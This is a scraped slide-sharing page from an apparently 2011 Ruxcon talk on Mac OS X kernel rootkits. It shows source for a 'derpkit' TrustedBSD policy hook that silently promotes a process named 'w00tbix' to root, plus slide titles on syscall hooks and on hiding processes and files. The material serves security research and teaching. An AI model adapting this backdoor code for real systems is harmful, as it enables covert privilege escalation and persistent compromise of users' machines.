Defiling Mac OS X - Ruxcon - Reverse Engineering Mac OS X - PUT ...

More documents

Recommendations

Info

static mac_policy_handle_t mac_handle; TECHNIQUES TRUSTEDBSD HOOKS static struct mac_policy_ops mac_ops = { !.mpo_proc_check_get_task = mac_policy_gettask, }; Our callback static struct mac_policy_conf mac_policy_conf = { !.mpc_name = "derpkit", !.mpc_fullname = "derpkit", !.mpc_labelnames = NULL, !.mpc_labelname_count = 0, !.mpc_ops = &mac_ops, !.mpc_loadtime_flags = MPC_LOADTIME_FLAG_UNLOADOK, !.mpc_field_off = NULL, !.mpc_runtime_flags = 0 }; Defiling Mac OS X - Ruxcon November, 2011
TECHNIQUES TRUSTEDBSD HOOKS kern_return_t derpkit_start (kmod_info_t * ki, void * d) { mac_policy_register(&mac_policy_conf, &mac_handle, d); Register policy options return KERN_SUCCESS; } static int Our callback mac_policy_gettask(kauth_cred_t cred, struct proc *p) { /* Grab the process name */ char processname[MAXCOMLEN+1]; proc_name(p->p_pid, processname, sizeof(processname)); /* If this is our rootkit cli */ if (strcmp(processname, "w00tbix") == 0) { /* Promote it to uid = 0 */ promote_proc(p->p_pid); }! } return 0; Defiling Mac OS X - Ruxcon November, 2011
Page 1 and 2: DEFILING MAC OS X: KERNEL ROOTKITS
Page 3 and 4: STUFF Things I will talk about ‣
Page 5 and 6: Defiling Mac OS X - Ruxcon November
Page 7 and 8: GETTING CODE INTO THE KERNEL Defili
Page 9 and 10: TECHNIQUES GETTING CODE INTO THE KE
Page 11 and 12: TECHNIQUES GETTING CODE INTO THE KE
Page 13 and 14: TECHNIQUES DODGY KERNEL SYMBOL RESO
Page 15 and 16: TECHNIQUES DODGY KERNEL SYMBOL RESO
Page 17 and 18: TECHNIQUES SYSCALL HOOKS Old faithf
Page 19 and 20: TECHNIQUES SYSCALL HOOKS static str
Page 21: TECHNIQUES TRUSTEDBSD HOOKS Trusted
Page 25 and 26: TECHNIQUES NETWORKING HOOKS Registe
Page 27 and 28: ROOTKITTERY Defiling Mac OS X - Rux
Page 29 and 30: TECHNIQUES PROCESS PRIVESC void pro
Page 31 and 32: TECHNIQUES HIDING PROCESSES Might l
Page 33 and 34: TECHNIQUES HIDING FILES Hiding file
Page 35 and 36: ONE MORE THING... *cue turtleneck*
Page 37 and 38: EFI THE EXPLOSIVE FARMVILLE INVARIA
Page 39 and 40: EFI THE EXPANSIVE FURNITURE INTERFE
Page 41 and 42: REFERENCES Mac OS X Kernel Programm

Defiling Mac OS X - Ruxcon - Reverse Engineering Mac OS X - PUT ...

Create successful ePaper yourself

Delete template?

Save as template?